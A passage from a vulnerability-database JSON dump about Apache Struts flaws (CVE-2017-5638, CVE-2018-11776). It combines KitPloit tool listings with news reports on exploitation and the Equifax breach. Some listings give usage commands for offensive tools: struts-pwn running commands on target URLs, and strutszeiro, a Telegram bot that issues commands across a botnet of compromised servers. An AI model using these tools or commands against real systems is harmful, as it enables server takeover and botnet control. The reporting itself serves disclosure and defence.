\n\n\n[](<https://1.bp.blogspot.com/-2tdM6fuXGfQ/XYAeOc1TdNI/AAAAAAAAQXs/o9Yh-_pJEdwOcF-5KM-3Hj9CjQSlHLl5wCNcBGAsYHQ/s1600/mitaka_9_1.gif>)\n\n \n\n\n[](<https://1.bp.blogspot.com/-4t9b6shG_iQ/XYAeOVytJkI/AAAAAAAAQXw/b4P4PJz5gU0lDqmKpJ9dL3jhiUVXkhOxwCNcBGAsYHQ/s1600/mitaka_10_2.gif>)\n\n \n**Note:** \nPlease set your urlscan.io & [VirusTotal](<https://www.kitploit.com/search/label/VirusTotal> \"VirusTotal\" ) API keys in the options page for enabling urlscan.io & VirusTotal scans. \n \n**Options** \nYou can enable / disable a search engine on the options page based on your preference. \n \n\n\n[](<https://1.bp.blogspot.com/-dP_LGUSsF1M/XYAeT14bPsI/AAAAAAAAQX0/U7gyifaFxOgCv92e0_k0fugVzaLMShGIACNcBGAsYHQ/s1600/mitaka_11_options.png>)\n\n \n**About Permissons** \nThis browser extension requires the following permissions. \n\n\n * `Read and change all your data on the websites you visit`: \n * This extension creates context menus dynamically based on what you select on a website.\n * It means this extension requires reading all your data on the websites you visit. (This extension doesn't change anything on the websites)\n * `Display notifications`: \n * This extension makes a notification when something goes wrong.\nI don't (and will never) collect any information from the users. \n \n**Alternatives or Similar Tools** \n\n\n * [CrowdScrape](<https://chrome.google.com/webstore/detail/crowdscrape/jjplaeklnlddpkbbdbnogmppffokemej> \"CrowdScrape\" )\n * [Gotanda](<https://github.com/HASH1da1/Gotanda> \"Gotanda\" )\n * [Sputnik](<https://github.com/mitchmoser/sputnik> \"Sputnik\" )\n * [ThreatConnect Integrated ](<https://chrome.google.com/webstore/detail/threatconnect-integrated/lblgcphpihpadjdpjgjnnoikjdjcnkbh> \"ThreatConnect Integrated \" )[Chrome](<https://www.kitploit.com/search/label/Chrome> \"Chrome\" ) Extension\n * [ThreatPinch Lookup](<https://github.com/cloudtracer/ThreatPinchLookup> \"ThreatPinch Lookup\" )\n * [VTchromizer](<https://chrome.google.com/webstore/detail/vtchromizer/efbjojhplkelaegfbieplglfidafgoka> \"VTchromizer\" )\n \n**How to build (for developers)** \nThis browser extension is written in [TypeScript](<https://www.typescriptlang.org/> \"TypeScript\" ) and built by [webpack](<https://webpack.js.org/> \"webpack\" ). \nTypeScript files will start out in `src` directory, run through the TypeScript compiler, then webpack, and end up in JavaScript files in `dist` directory. \n\n \n \n git clone https://github.com/ninoseki/mitaka.git\n cd mitaka\n npm install\n npm run test\n npm run build\n\nFor loading an unpacked extension, please follow the procedures described at <https://developer.chrome.com/extensions/getstarted>. \n \n**Misc** \nMitaka/\u898b\u305f\u304b means \"Have you seen it?\" in Japanese. \n \n \n\n\n**[Download Mitaka](<https://github.com/ninoseki/mitaka> \"Download Mitaka\" )**\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-09-21T12:00:00", "type": "kitploit", "title": "Mitaka - A Browser Extension For OSINT Search", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2019-09-21T12:00:07", "id": "KITPLOIT:8708017483803645203", "href": "http://www.kitploit.com/2019/09/mitaka-browser-extension-for-osint.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-02T16:29:07", "description": "[](<https://2.bp.blogspot.com/-XZN2TA7nQZ0/WGSL3ia76KI/AAAAAAAAGuE/8pxmxtrizn8Yu1Y6iIArXYBgsL3Rhww3ACLcB/s1600/telegram-bot.png>)\n\n \nTelegram Bot to manage botnets created with struts vulnerability(CVE-2017-5638) \n \n** Dependencies ** \n\n \n \n pip install -r requeriments.txt \n\n \n** Config ** \n\n \n \n Create a telegram bot, save the API token in config/token.conf\n Create a telegram group, save the group id in config/group.conf\n\n \n** Start ** \npython strutszeiro.py \n \n** Telegram Usage ** \n\n \n \n /add url - test vulnerability and add the new server\n /exploit url *cmd - execute commands in a specific server (you need to use the * caracter)\n /botnet cmd - execute commands in all servers\n /list - show all servers in botnet\n /total - show total of servers in botnet\n\nThanks to [ @btamburi ](<https://twitter.com/BrenoTamburi>) \n \n \n\n\n** [ Download strutszeiro ](<https://github.com/mthbernardes/strutszeiro>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-14T17:30:00", "type": "kitploit", "title": "strutszeiro - Telegram Bot to manage botnets created with struts vulnerability (CVE-2017-5638)", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-14T17:30:13", "id": "KITPLOIT:9079806502812490909", "href": "http://www.kitploit.com/2017/03/strutszeiro-telegram-bot-to-manage.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-02T16:29:07", "description": "[](<https://2.bp.blogspot.com/-11EAxL668ng/WMfWw388UFI/AAAAAAAAHa8/FeOT6wUDm_s_Ro41Cs6Ttq7cMXH5BPATQCLcB/s1600/struts-pwn.png>)\n\n \n** An exploit for Apache Struts CVE-2017-5638** \n \n** ** Usage ** ** \n \n** Testing a single URL. ** \n\n \n \n python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id'\n\n \n** Testing a list of URLs. ** \n\n \n \n python struts-pwn.py --list 'urls.txt' -c 'id'\n\n \n** Checking if the vulnerability exists against a single URL. ** \n\n \n \n python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action'\n\n \n** Checking if the vulnerability exists against a list of URLs. ** \n\n \n \n python struts-pwn.py --check --list 'urls.txt'\n\n \n** ** Requirements ** ** \n\n\n * Python2 or Python3 \n * requests \n \n** ** Legal Disclaimer ** ** \nThis project is made for educational and ethical testing purposes only. Usage of struts-pwn for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. \n \n** ** Author ** ** \n_ Mazin Ahmed _ \n\n\n * Website: [ https://mazinahmed.net ](<https://mazinahmed.net/>)\n * Email: _ mazin AT mazinahmed DOT net _\n * Twitter: [ https://twitter.com/mazen160 ](<https://twitter.com/mazen160>)\n * Linkedin: [ http://linkedin.com/in/infosecmazinahmed](<http://linkedin.com/in/infosecmazinahmed>)\n \n\n\n** [ Download struts-pwn ](<https://github.com/mazen160/struts-pwn>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-14T13:34:00", "type": "kitploit", "title": "struts-pwn - An exploit for Apache Struts CVE-2017-5638", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-14T13:34:05", "id": "KITPLOIT:1841841790447853746", "href": "http://www.kitploit.com/2017/03/struts-pwn-exploit-for-apache-struts.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-11T00:37:47", "description": "[](<https://4.bp.blogspot.com/-ueegtNhcGOM/WMtkR8p9hRI/AAAAAAAAHbo/eHq-bF-Q2GgzOPgzXd9XIaTs4L-JlNr7wCLcB/s1600/Struts2Shell.png>)\n\n \nImproves manipulation and sending commands to the vulnerable Apache Struts server using a shell. \n \n**Usage:** \n\n \n \n python Struts2Shell.py\n\n \n\n\n** [ Download Struts2Shell ](<https://github.com/s1kr10s/Struts2Shell>) **\n", "cvss3": {}, "published": "2017-03-17T14:22:00", "type": "kitploit", "title": "Struts2Shell - Interactive Shell Command to Exploit Apache Struts CVE-2017-5638", "bulletinFamily": "tools", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-17T14:22:01", "id": "KITPLOIT:2304674796555328667", "href": "http://www.kitploit.com/2017/03/struts2shell-interactive-shell-command.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2022-05-09T12:40:18", "description": "[](<https://thehackernews.com/images/-ktDJMSI6Gdo/W310Im7Od5I/AAAAAAAAx8k/iNNQd5VURi8zRV8-MZosbkEo-V4eXjqowCLcBGAs/s728-e100/apache-struts-vulnerability-hacking.png>)\n\nSemmle security researcher Man Yue Mo has [disclosed](<https://lgtm.com/blog/apache_struts_CVE-2018-11776>) a critical remote code execution vulnerability in the popular Apache Struts web application framework that could allow remote attackers to run malicious code on the affected servers. \n \nApache Struts is an open source framework for developing web applications in the Java programming language and is widely used by enterprises globally, including by 65 percent of the Fortune 100 companies, like Vodafone, Lockheed Martin, Virgin Atlantic, and the IRS. \n \nThe vulnerability (**CVE-2018-11776**) resides in the core of Apache Struts and originates because of insufficient validation of user-provided untrusted inputs in the core of the Struts framework under certain configurations. \n \nThe newly found Apache Struts exploit can be triggered just by visiting a specially crafted URL on the affected web server, allowing attackers to execute malicious code and eventually take complete control over the targeted server running the vulnerable application. \n \n\n\n## Struts2 Vulnerability - Are You Affected?\n\n \nAll applications that use Apache Struts\u2014supported versions (Struts 2.3 to Struts 2.3.34, and Struts 2.5 to Struts 2.5.16) and even some unsupported Apache Struts versions\u2014are potentially vulnerable to this flaw, even when no additional plugins have been enabled. \n \n\n\n> \"This vulnerability affects commonly-used endpoints of Struts, which are likely to be exposed, opening up an attack vector to malicious hackers,\" Yue Mo said.\n\n \nYour Apache Struts implementation is vulnerable to the reported RCE flaw if it meets the following conditions: \n\n\n * The **alwaysSelectFullNamespace** flag is set to true in the Struts configuration.\n * Struts configuration file contains an \"action\" or \"url\" tag that does not specify the optional namespace attribute or specifies a wildcard namespace.\nAccording to the researcher, even if an application is currently not vulnerable, \"an inadvertent change to a Struts configuration file may render the application vulnerable in the future.\" \n \n\n\n## Here's Why You Should Take Apache Struts Exploit Seriously\n\n \nLess than a year ago, credit rating agency Equifax exposed [personal details of its 147 million consumers](<https://thehackernews.com/2017/09/equifax-apache-struts.html>) due to their failure of patching a similar [Apache Struts flaw](<https://thehackernews.com/2017/03/apache-struts-framework.html>) that was disclosed earlier that year (CVE-2017-5638). \n \nThe Equifax breach cost the company over $600 million in losses. \n\n\n> \"Struts is used for publicly-accessible customer-facing websites, vulnerable systems are easily identified, and the flaw is easy to exploit,\" said Pavel Avgustinov, Co-founder & VP of QL Engineering at Semmle.\n\n> \"A hacker can find their way in within minutes, and exfiltrate data or stage further attacks from the compromised system.\"\n\n \n\n\n## Patch Released for Critical Apache Struts Bug\n\n[](<https://thehackernews.com/images/-aZ6JnELsib4/W31pGhAz6bI/AAAAAAAAx8M/0d3umSPy5YATSc8sNXCx5cKejhIftncEgCLcBGAs/s728-e100/apache-struts-vulnerability-exploit.png>)\n\nApache Struts has fixed the vulnerability with the release of Struts versions 2.3.35 and 2.5.17. Organizations and developers who use Apache Struts are urgently advised to upgrade their Struts components as soon as possible. \n \nWe have seen how previous disclosures of similar critical flaws in Apache Struts have resulted in [PoC exploits](<https://thehackernews.com/2017/03/apache-struts-framework.html>) being published within a day, and exploitation of the [vulnerability in the wild](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>), putting critical infrastructure as well as customers' data at risk. \n \nTherefore, users and administrators are strongly advised to upgrade their Apache Struts components to the latest versions, even if they believe their configuration is not vulnerable right now. \n \nThis is not the first time the Semmle Security Research Team has reported a critical RCE flaw in Apache Struts. Less than a year ago, the team disclosed a similar [remote code execution vulnerability](<https://thehackernews.com/2017/09/apache-struts-vulnerability.html>) (CVE-2017-9805) in Apache Struts. \n \n\n\n## UPDATE \u2014 Apache Struts RCE Exploit PoC Released\n\n[](<https://thehackernews.com/images/-fNjQzu1b7iw/W376YS-nYjI/AAAAAAAAx9I/T7MopN2IxtwTxicu4k8j55ywy0GbIRQHgCLcBGAs/s728-e100/apache-struts-exploit-poc-rce-vulnerability.png>)\n\nA security researcher has today released [a PoC exploit](<https://github.com/jas502n/St2-057/blob/master/README.md>) for the newly discovered remote code execution (RCE) vulnerability (CVE-2018-11776) in Apache Struts web application framework.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-08-22T14:04:00", "type": "thn", "title": "New Apache Struts RCE Flaw Lets Hackers Take Over Web Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805", "CVE-2018-11776"], "modified": "2018-08-23T18:30:56", "id": "THN:89C2482FECD181DD37C6DAEEB7A66FA9", "href": "https://thehackernews.com/2018/08/apache-struts-vulnerability.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:40:51", "description": "[](<https://thehackernews.com/images/-1V4miBZKvxA/W6OU7pQw5sI/AAAAAAAAyLM/GdXx9FNEs_UiDXCnBFucDDfdR_AGIzUkwCLcBGAs/s728-e100/equifax-data-breach.jpg>)\n\nAtlanta-based consumer credit reporting agency Equifax has been issued a \u00a3500,000 fine by the UK's privacy watchdog for its last year's [massive data breach](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) that exposed personal and financial data of hundreds of millions of its customers. \n \nYes, \u00a3500,000\u2014that's the maximum fine allowed by the UK's Data Protection Act 1998, though the penalty is apparently a small figure for a $16 billion company. \n \nIn July this year, the UK's data protection watchdog issued the maximum allowed fine of [\u00a3500,000 on Facebook](<https://thehackernews.com/2018/07/facebook-cambridge-analytica.html>) over the [Cambridge Analytica scandal](<https://thehackernews.com/2018/03/facebook-cambridge-analytica.html>), saying the social media giant Facebook failed to prevent its citizens' data from falling into the wrong hands. \n \n\n\n## Flashback: The Equifax Data Breach 2017\n\n \nEquifax suffered a massive data breach last year between mid-May and the end of July, exposing highly [sensitive data of as many as 145 million people](<https://thehackernews.com/2017/10/equifax-credit-security-breach.html>) globally. \n \nThe stolen information included victims' names, dates of birth, phone numbers, driver's license details, addresses, and social security numbers, along with credit card information and personally identifying information (PII) for hundreds of thousands of its consumers. \n \nThe data breach occurred because the company failed to patch a [critical Apache Struts 2 vulnerability](<https://thehackernews.com/2017/09/equifax-apache-struts.html>) ([CVE-2017-5638](<https://thehackernews.com/2017/03/apache-struts-framework.html>)) on time, for which patches were already issued by the respected companies. \n \n\n\n## Why U.K. Has Fined a US Company?\n\n \nThe UK's Information Commissioner's Office (ICO), who launched a joint investigation into the breach with the Financial Conduct Authority, has now [issued](<https://ico.org.uk/about-the-ico/news-and-events/news-and-blogs/2018/09/credit-reference-agency-equifax-fined-for-security-breach/>) its largest possible monetary penalty under the country's Data Protection Act for the massive data breach\u2014\u00a3500,000, which equals to around $665,000. \n \nThe ICO said that although the [cyber attack compromised Equifax](<https://thehackernews.com/2017/09/equifax-data-breach.html>) systems in the United States, the company \"failed to take appropriate steps\" to protect the personal information of its 15 million UK customers. \n \nThe ICO investigation revealed \"multiple failures\" at the company like keeping users' personal information longer than necessary, which resulted in: \n\n\n * 19,993 UK customers had their names, dates of birth, telephone numbers and driving license numbers exposed.\n * 637,430 UK customers had their names, dates of birth and telephone numbers exposed.\n * Up to 15 million UK customers had names and dates of birth exposed.\n * Some 27,000 Britishers also had their Equifax account email addresses swiped.\n * 15,000 UK customers also had their names, dates of birth, addresses, account usernames and plaintext passwords, account recovery secret questions, and answers, obscured credit card numbers, and spending amounts stolen by hackers.\n \n\n\n## Breach Was Result of Multiple Failures at Equifax\n\n \nThe ICO said that Equifax had also been warned about a [critical Apache Struts 2 vulnerability](<https://thehackernews.com/2017/03/apache-struts-framework.html>) in its systems by the United States Department of Homeland Security (DHS) in March 2017, but the company did not take appropriate steps to fix the issue. \n \nInitially, it was also reported that the company kept news of the [breach hidden for a month](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) after its internal discovery, giving three senior executives at Equifax time to sell almost $2 million worth of its shares, though the company denied such claims. \n \nSince the data breach happened before the EU's General Data Protection Regulation (GDPR) took effect in May 2018, the maximum fine of \u00a3500,000 imposed under the UK's old Data Protection Act 1998 is still lesser. \n \nThe penalty could have been much larger had it fallen under GDPR, wherein a company could face a [maximum fine of 20 million euros](<https://thehackernews.com/2017/08/data-breach-security-law.html>) or 4 percent of its annual global revenue, whichever is higher, for such a privacy breach. \n \nIn response to the ICO's penalty, Equifax said that the company has fully cooperated with the ICO throughout the investigation that it is \"disappointed in the findings and the penalty.\" \n \nEquifax received the Monetary Penalty Notice from the ICO on Wednesday and can appeal the penalty.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-09-20T13:54:00", "type": "thn", "title": "UK Regulator Fines Equifax \u00a3500,000 Over 2017 Data Breach", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-09-20T13:54:52", "id": "THN:AF93AEDBDE6169AD1163D53979A4EA04", "href": "https://thehackernews.com/2018/09/equifax-credit-reporting-breach.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-27T09:17:16", "description": "[](<https://4.bp.blogspot.com/-YbGPFiDfo54/WMFEMrkhUUI/AAAAAAAArt0/axO9fhieprw6xBp0DoBNdECPB4t_le8uwCLcB/s1600/apache-struts-framework.png>)\n\nSecurity researchers have discovered a Zero-Day vulnerability in the popular Apache Struts web application framework, which is being actively exploited in the wild. \n \nApache Struts is a free, open-source, Model-View-Controller (MVC) framework for creating elegant, modern Java web applications, which supports REST, AJAX, and JSON. \n \nIn a [blog post](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) published Monday, Cisco's Threat intelligence firm Talos announced the team observed a number of active attacks against the zero-day vulnerability (CVE-2017-5638) in Apache Struts. \n \nAccording to the researchers, the issue is a remote code execution vulnerability in the Jakarta Multipart parser of Apache Struts that could allow an attacker to execute malicious commands on the server when uploading files based on the parser. \n\n\n> \"It is possible to perform an RCE attack with a malicious Content-Type value,\" [warned](<https://cwiki.apache.org/confluence/display/WW/S2-045>) Apache. \"If the Content-Type value isn't valid an exception is thrown which is then used to display an error message to a user.\"\n\nThe vulnerability, documented at Rapid7's Metasploit Framework [GitHub site](<https://github.com/rapid7/metasploit-framework/issues/8064>), has been patched by Apache. So, if you are using the Jakarta-based file upload Multipart parser under Apache Struts 2, you are advised to upgrade to Apache Struts version 2.3.32 or 2.5.10.1 immediately. \n \n\n\n### Exploit Code Publicly Released\n\n \nSince the Talos researchers detected public proof-of-concept (PoC) exploit code (which was uploaded to a Chinese site), the vulnerability is quite dangerous. \n \nThe researchers even detected \"a high number of exploitation events,\" the majority of which seem to be leveraging the publicly released PoC that is being used to run various malicious commands. \n\n\n[](<https://2.bp.blogspot.com/-OMaYI0kDfZk/WME-W6XvmwI/AAAAAAAArtc/4rw52IxHjJYLJOlufdQEoxxQwjYWAbGmQCLcB/s1600/apache-exploit-code.png>)\n\nIn some cases, the attackers executed simple \"whoami\" commands to see if the target system is vulnerable, while in others, the malicious attacks turned off firewall processes on the target and dropped payloads. \n\n\n[](<https://2.bp.blogspot.com/-1fS7Z-ZsPgA/WME-E_vWvTI/AAAAAAAArtY/k_8FmAtSwaU9ICPEjN1gQMTdPHsQSRyFACLcB/s1600/apache-exploit.png>)\n\n \n\n\n> \"Final steps include downloading a malicious payload from a web server and execution of said payload,\" the researchers say. \"The payloads have varied but include an IRC bouncer, a DoS bot, and a sample related to the Bill Gates botnet... A payload is downloaded and executed from a privileged account.\"\n\nAttackers also attempted to gain persistence on infected hosts by adding a binary to the boot-up routine. \n \nAccording to the researchers, the attackers tried to copy the file to a benign directory and ensure_ \"that both the executable runs and that the firewall service will be disabled when the system boots.\"_ \n \nBoth Cisco and Apache researchers urge administrators to upgrade their systems to Apache Struts version 2.3.32 or 2.5.10.1 as soon as possible. Admins can also switch to a different [implementation](<https://cwiki.apache.org/confluence/display/WW/File+Upload#FileUpload-AlternateLibraries>) of the Multipart parser.\n", "cvss3": {}, "published": "2017-03-09T01:03:00", "type": "thn", "title": "New Apache Struts Zero-Day Vulnerability Being Exploited in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-09T12:03:10", "id": "THN:2707247140A4F620671B33D68FEB1EA9", "href": "https://thehackernews.com/2017/03/apache-struts-framework.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:53", "description": "[](<https://4.bp.blogspot.com/-7t3BApLnYmI/WdM9FFq_vsI/AAAAAAAAATQ/KVrOmkm6SzoTm_8rLuSGnUbnhJudoRXwwCLcBGAs/s1600/equifax-data-breach.png>)\n\n[Equifax data breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) was bigger than initially reported, exposing highly sensitive information of more Americans than previously revealed. \n \nCredit rating agency Equifax says an additional 2.5 million U.S. consumers were also impacted by the massive data breach the company disclosed last month, bringing the total possible victims to 145.5 million from 143 million. \n \nEquifax last month announced that it had suffered a massive data breach that exposed highly sensitive data of hundreds of millions of its customers, which includes names, social security numbers, dates of birth and addresses. \n \nIn addition, credit card information for [nearly 209,000 customers](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) was also stolen, as well as certain documents with personally identifying information (PII) for approximately 182,000 Equifax consumers. \n \nThe breach was due to a critical vulnerability ([CVE-2017-5638](<https://thehackernews.com/2017/03/apache-struts-framework.html>)) in Apache Struts 2 framework, which Apache patched over two months earlier (on March 6) of the security incident. \n \nEquifax was even [informed by the US-CERT](<https://thehackernews.com/2017/09/equifax-apache-struts.html>) on March 8 to patch the flaw, but the company failed to identified or patched its systems against the issue, Equifax ex-CEO Richard Smith said in a statement [[PDF](<http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf>)] to the House Committee on Energy and Commerce. \n\n\n> \"It appears that the breach occurred because of both human error and technology failures,\" Smith said. \"Equifax's information security department also ran scans that should have identified any systems that were vulnerable to the Apache Struts issue...Unfortunately, however, the scans did not identify the Apache Struts vulnerability.\"\n\nIn the wake of the security incident, the company hired FireEye-owned security firm Mandiant to investigate the breach, which has now concluded the forensic portion of its investigation and plans to release the results \"promptly.\" \n \nMandiant said a total of 145.5 million consumers might now potentially have been [impacted by the breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>), which is 2.5 million more than previously estimated. However, the firm did not identify any evidence of \"new attacker activity.\" \n\n\n> \"Mandiant did not identify any evidence of additional or new attacker activity or any access to new databases or tables,\" Equifax said in a Monday [press release](<https://investor.equifax.com/news-and-events/news/2017/10-02-2017-213238821>). \n\n> \"Instead, this additional population of consumers was confirmed during Mandiant's completion of the remaining investigative tasks and quality assurance procedures built into the investigative process.\"\n\nThe forensic investigation also found that approximately 8,000 Canadian consumers were also impacted, which is much lower than the 100,000 initially estimated figure by the credit rating and reporting firm. \n \nHowever, Equifax said that this figure \"was preliminary and did not materialize.\" \n \n\"I want to apologize again to all impacted consumers. As this important phase of our work is now completed, we continue to take numerous steps to review and enhance our cybersecurity practices,\" newly appointed interim CEO, Paulino do Rego Barros, Jr. said. \n \n\"We also continue to work closely with our internal team and outside advisors to implement and accelerate long-term security improvements.\" \n \nEquifax, which maintains data on over 820 million consumers and over 91 million businesses worldwide, also said the company would update its own notification by October 8 for its customers who want to check if they were among those affected by the data breach.\n", "cvss3": {}, "published": "2017-10-02T21:23:00", "type": "thn", "title": "Whoops, Turns Out 2.5 Million More Americans Were Affected By Equifax Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-10-03T08:23:36", "id": "THN:ACD3479531482E2CA5A8E15EB6B47523", "href": "https://thehackernews.com/2017/10/equifax-credit-security-breach.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:55", "description": "[](<https://3.bp.blogspot.com/-F7ViQ9JXvL8/Wbo_3TiAKWI/AAAAAAAAAJM/fsHVxS_O8ysIy4sZ2wdnG1OfLkiNJTjzgCLcBGAs/s1600/equifax-apache-struts.png>)\n\nThe [massive Equifax data breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) that exposed highly sensitive data of as many as 143 million people was caused by [exploiting a flaw in Apache Struts](<https://thehackernews.com/2017/03/apache-struts-framework.html>) framework, which Apache patched over two months earlier of the security incident, Equifax has confirmed. \n \nCredit rating agency Equifax is yet another example of the companies that became victims of massive cyber attacks due to not patching a critical vulnerability on time, for which patches were already issued by the respected companies. \n \nRated critical with a maximum 10.0 score, the Apache Struts2 vulnerability (CVE-2017-5638) exploited in the Equifax breach was disclosed and fixed by Apache on March 6 with the release of Apache Struts version 2.3.32 or 2.5.10.1. \n \nThis flaw is separate from CVE-2017-9805, [another Apache Struts2 vulnerability](<https://thehackernews.com/2017/09/apache-struts-vulnerability.html>) that was patched earlier this month, which was a programming bug that manifests due to the way Struts REST plugin handles XML payloads while deserializing them, and was fixed in Struts version 2.5.13. \n \nRight after the disclosure of the vulnerability, hackers started actively exploiting the flaw in the wild to install rogue applications on affected web servers after its [proof-of-concept (PoC) exploit code](<https://thehackernews.com/2017/03/apache-struts-framework.html>) was uploaded to a Chinese site. \n \nDespite patches were made available and proofs that the flaw was already under mass attack by hackers, Equifax failed to patched its Web applications against the flaw, which resulted in the breach of personal data of [nearly half of the US 